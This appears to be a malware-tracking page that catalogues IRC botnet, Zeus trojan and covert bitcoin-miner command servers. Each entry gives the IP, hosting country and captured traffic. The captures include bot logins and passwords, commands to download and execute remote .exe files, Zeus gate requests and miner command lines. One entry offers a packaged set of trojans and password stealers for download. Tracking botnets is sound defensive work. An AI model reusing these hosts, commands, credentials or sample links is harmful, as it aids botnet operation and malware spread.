3 websites use this address. (examples: btcminers.biz labekaa.com xety.fr) Remote Host Port Number 92.243.4.133 5900 PASS Virus channel #3new# NICK VirUs-ymurahxw USER VirUs “” “gyf” : 8Coded 8VirUs.. NICK VirUs-urxuktmo USER VirUs “” “gux” : hosting infos: http://whois.domaintools.com/92.243.4.133
46.20.40.193(ngrBot hosted in Germany Myloc Managed It Ag)
Remote Host Port Number 213.251.170.52 80 46.20.40.193 1337 PASS ngrBot NICK n{US|XPa}lqosuhk USER lqosuhk 0 0 :lqosuhk JOIN #ngr ngrBot PONG :Astros.GoV Now talking in #ngr Topic On : [ #ngr ] [ !mod pdef on ] Topic By : [ Astros ] hosting infos: http://whois.domaintools.com/46.20.40.193
40mb malware samples
Here again with another package for malware lovers most of them are baking trojans passwords stealers and irc bots Download: http://adf.ly/2CVhM
b.mobinil.biz(Silent BitCoin GPU Miner using Phoenix Miner)
http://b.mobinil.biz:8332/ cgminer.exe -o http://b.mobinil.biz:8332/ -u redem_g -p redemxxxxxxx -I 6 mamita.exe -a 59 -g yes -o http://b.mobinil.biz:8332/ -u redem_guild -p redem -t 2 mamita.exe -a 59 -g yes -o http://b.mobinil.biz:8332/ -u redem_guild -p redem -t 2 Resolved : [ b.mobinil.biz ] To [ 46.4.123.12 ] Resolved : [ b.mobinil.biz ] To [ 108.60.208.157 ] ResolvedRead more...
115.239.230.68(ngrBot hosted in China Zhejiang Ninbo Lanzhong Network Ltd)
Remote Host Port Number 115.239.230.68 5101 PASS hax0r 203.17.62.187 80 213.251.170.52 80 31.184.237.82 80 64.111.199.221 80 66.45.56.124 80 67.225.165.214 80 70.38.98.236 80 70.38.98.239 80 PASS hax0r..KCIK n{US|XPa}ncfvgh k..RSSR ncfvghk 0 0 :ncfvghk..SE ND #ngme ng00.. PRIVMSG #ngme :[d=”http://31.184.237.82/ms02.exe” s=”100352 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.tmp” – Download retries: 0 PRIVMSG #ngme :[d=”http://31.184.237.82/ppbnt.exe” s=”61440 bytes”]Read more...
77.235.47.132(ngrBot hosted in Netherlands Amsterdam Eurovps)
Remote Host Port Number 195.122.131.12 80 213.251.170.52 80 77.235.47.132 4042 PASS ngrBot PRIVMSG #boss :[d=”http://rapidshare.com/files/4007909942/shedontlikemeshelikemycar.exe”] Error downloading file [e=”12039″] NICK n{US|XPa}psbuhdn USER psbuhdn 0 0 :psbuhdn JOIN #boss ngrBot PRIVMSG #boss :[MSN]: Updated MSN spread interval to “3” PRIVMSG #boss :[MSN]: Updated MSN spread message to “haha! http://goo.gl/LVZjX?img=facebook_photoalbum_24_07_2011_jpeg” The data identified by the following URLsRead more...
irc.swag.net(around 1.5k bots hosted in Germany Netdirect)
server: 178.162.234.177:6667 channel: #nix heckers inside the botnet: var $admins = array ( ‘LiGHTzz’ => ‘e48e13207341b6bffb7fb1622282247b’, ‘cmd’ => ‘e48e13207341b6bffb7fb1622282247b’, ‘broken’ => ‘e48e13207341b6bffb7fb1622282247b’, Operators : 10 operator(s) online Channels : 14 channels formed Clients : I have 131 clients and 1 servers Local users : Current Local Users: 131 Max: 1574 Global users : Current GlobalRead more...
50.31.0.109(1k linux bots hosted in United States Chicago Steadfast Networks)
var $config = array(“server”=>”50.31.0.109”, “port”=>”8080”, “pass”=>””, “prefix”=>”tibia|”, “maxrand”=>”4”, “chan”=>”#tibia2”, “chan2″=>”#tibia”, “key”=>”puto”, “modes”=>”+p”, “password”=>”lol321”, “trigger”=>”.”, “hostauth”=>”*” // Invisible Users : 2 Channels : 1 channels formed Clients : I have 148 clients and 0 servers Local users : Current local users: 148 Max: 1000 Global users : Current global users: 148 Max: 1000 hosting infos: http://whois.domaintools.com/50.31.0.109
ks3096360.kimsufi.com(zeus banking trojans hosted in France Ovh Systems)
ks3096360.kimsufi.com DNS_TYPE_A 94.23.232.121 Port Type 24477 tcp – HTTP Conversations: 94.23.232.121:80 – [ks3096360.kimsufi.com] Request: GET /Zeus/config.bin Response: 200 “OK” 74.125.224.146:80 – [www.google.com] Request: GET /webhp Response: 200 “OK” 94.23.232.121:80 – [ks3096360.kimsufi.com] Request: POST /Zeus/gate.php Response: 200 “OK” Request: POST /Zeus/gate.php Response: 200 “OK” EXE FILE: http://ks3096360.kimsufi.com/Zeus/bot.exe hosting infos: http://whois.domaintools.com/94.23.232.121
78.188.249.114(irc botnet hosted in Turkey Istanbul Turk Telekomunikasyon Anonim Sirketi)
Remote Host Port Number 78.188.249.114 7777 MODE {KnoX|USA|564335} -ix JOIN ##imbot## KCA PRIVMSG ##imbot## : Exe Rarl Dosyalara Ekleniyor. PONG HTTP1.4 NICK {KnoX|USA|564335} USER COMPUTERNAME * 0 :COMPUTERNAME Now talking in ##imbot## Topic 11 On 12: [ ##imbot## ] [ .rar ] Topic 11 By 12: [ KnX ] hosting infos: http://whois.domaintools.com/78.188.249.114